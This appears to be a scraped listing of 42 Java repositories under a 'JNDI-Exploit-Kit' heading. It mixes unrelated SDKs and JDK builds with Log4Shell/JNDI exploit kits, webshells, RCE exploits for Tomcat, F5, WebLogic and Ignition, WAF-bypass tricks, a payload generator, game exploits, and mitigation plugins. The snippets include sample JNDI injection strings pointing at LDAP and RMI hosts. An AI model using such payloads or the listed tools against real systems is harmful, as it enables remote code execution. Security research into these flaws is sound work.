42 Repositories
Java JNDI-Exploit-Kit Libraries
Google's ML-Kit-Vision demo (android) for pre encoded video.
Android ML Kit Vision demo with Video Google's ML-Kit-Vision demo (android) for pre encoded video. Demos for camera preview and still image are also i
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
A pre-authenticated RCE exploit for Inductive Automation Ignition
Randy What This is a pre-authenticated RCE exploit for Inductive Automation Ignition that impacts versions = 8.1.16. We failed to exploit the bugs at
React Native On-Device Machine Learning w/ Google ML Kit
React Native ML Kit React Native On-Device Machine Learning w/ Google ML Kit Supported Modules Module Android iOS Image Labeling ✅ ✅ Identify Language
The VAST ad sample code provided by HUAWEI Ads Kit describes how to display linear ads by integrating the HUAWEI VAST SDK into your app.
HMS Ads Demo for VAST English | 中文 Table of Contents Introduction Installation Configuration Supported Environments Sample Code Result License Introdu
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas
log4j2 remote code execution or IP leakage exploit (with examples)
log4j2-exploits 2021-12-11.12-17-44.mp4 This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
Fixes the log4j exploit from being sent to Minecraft clients.
⚠️ DEPRECATION ⚠️ Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already
GitHub Action to download and install Oracle's Java Development Kit builds
oracle-actions/setup-java This action downloads a Java Development Kit (JDK) built by Oracle and installs it using actions/setup-java. JDKs built by O
Protect your Spigot server against IP forwarding exploits, as well as blocking unknown BungeeCord and/or Velocity proxies.
Sentey Protect your Spigot server against IP forwarding exploits, as well as blocking unknown BungeeCord and/or Velocity proxies. But firewalls are a
LecternCrashFix - Fixes the lectern crash/exploit.
LecternCrashFix This fixes the new lectern crash/exploit. This bug is fixed on Paper build 276 and above. This is also fixed on CraftBukkit. Make sure
Simple plugin made for TimBW HCF to fix pearling noclip exploit
Simple plugin made for TimBW HCF to fix pearling noclip exploit. It currently can prevent pearl glitching throught blocks, and fences like all servers! Basic features implemented, so you can use this in production. 😃
Mod development kit for the Tecknix Client Modding API
Tecknix Mod Loader API THIS API IS NOT COMPLETE AND WILL NOT YET ALLOW YOU TO MOD THE CLIENT What is this? This is our modding MDK for Tecknix Client.
LOG4J Java exploit - WAF and patches bypass tricks
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on 🐱💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tr
JNDI-Exploit-Kit
JNDI-Exploit-Kit Disclaimer This is a forked modified version of the great exploitation tool created by @welk1n
A fabric client-side mod for an invincibility exploit.
invincibility-hack How to use: Type '*invincibility' in the chat to toggle the hack. Now once you die you will not see the death screen. After dying r
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use
NukeJndiLookupFromLog4j Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use -Dlog4
Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.
NoJNDI This is a simple proof of concept agent that disables JNDI lookups globally across the JVM. This is useful for mitigating the Log4Shell attack,
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
A short demo of CVE-2021-44228
sample-ldap-exploit A short demo of CVE-2021-44228 Build $ mvn clean verify Run Attacker $ java \ -cp 'attacker/target/sample-attacker.jar:attacker
JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.
JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi
The ByteSkript development kit, including resources for third-party libraries that are not contained within the standard runtime.
ByteSkript Development Kit Todo. The development kit is a set of advanced resources available for library creators. These are not available within the
Log4j-payload-generator - Log4j jndi injects the Payload generator
0x01 简介 log4j-payload-generator是 woodpecker框架 生产log4 jndi注入漏洞payload的插件。目前可以一键生产以下5类payload。 原始payload {[upper|lower]:x}类型随机混payload {[upper|lower]:x}
Don't use this maliciously, this is for testing
log4j-exploit-example Don't use this maliciously, this is for testing Specifically for testing within Minecraft, but this will probably work on other
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).
MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4
Tencent Kona JDK17 is a no-cost, production-ready distribution of the Open Java Development Kit (OpenJDK), Long-Term Support(LTS) with quarterly updates.
Tencent Kona JDK17 Tencent Kona JDK17 is a no-cost, production-ready distribution of the Open Java Development Kit (OpenJDK), Long-Term Support(LTS) w
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex
基于Google ML Kit 快速集成二维码扫描,速度比zxing快,可配置相册,闪光灯,相机可以调整焦距放大缩小,自定义扫描线颜色,自定义背景颜色,自定义遮罩层,支持同时扫多个二维码和条形码
MNMLKitScanner 基于Google MLKit 快速集成二维码扫描,速度比zxing快 基于Google MLKit 快速集成二维码扫描,速度比zxing快,可配置相册,闪光灯,相机可以调整焦距放大缩小,自定义扫描线颜色,自定义背景颜色,自定义遮罩层,支持同时扫多个二维码和条形码 功能:
The samples of RMI&JNDI Attack
RMI-JNDI-Attack-Samples The samples of RMI&JNDI attack RMI Client Attack Server Server Attack Client Registry Attack Client Registry Attack Server Cli
HUAWEI 3D Modeling Kit project contains a sample app. Guided by this demo, you will be able to implement full 3D Modeling Kit capabilities, including 3D object reconstruction and material generation.
HUAWEI 3D Modeling Kit Sample English | 中文 Introduction This project includes apps developed based on HUAWEI 3D Modeling Kit. The project directory is
A exploit to remotely check if a chunk is loaded.
InteractCordExploit (NoCom) A exploit to remotely check if a chunk is loaded which has been automated to create heatmaps and find chunks with active p
Tencent Kona JDK11 is a no-cost, production-ready distribution of the Open Java Development Kit (OpenJDK), Long-Term Support(LTS) with quarterly updates. Tencent Kona JDK11 is certified as compatible with the Java SE standard.
Tencent Kona JDK11 Tencent Kona JDK11 is a no-cost, production-ready distribution of the Open Java Development Kit (OpenJDK), Long-Term Support(LTS) w
CVE-2021-2109 && Weblogic Server RCE via JNDI
Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected
Funny exploit lol
InstantMine Funny exploit lol Found a few weeks back and now paid clients like konas are getting it so making it public :^) I come from constantiam so
Lightweight JavaFX Framework for Kotlin
TornadoFX JavaFX Framework for Kotlin Important: TornadoFX is not yet compatible with Java 9/10 Oracle is intending to decouple JavaFX from the JDK. W
http-kit is a minimalist, event-driven, high-performance Clojure HTTP server/client library with WebSocket and asynchronous support
HTTP Kit A simple, high-performance event-driven HTTP client+server for Clojure CHANGELOG | API | current Break Version: [http-kit "2.5.3"] ; Publish
Vert.x is a tool-kit for building reactive applications on the JVM
Vert.x Core This is the repository for Vert.x core. Vert.x core contains fairly low-level functionality, including support for HTTP, TCP, file system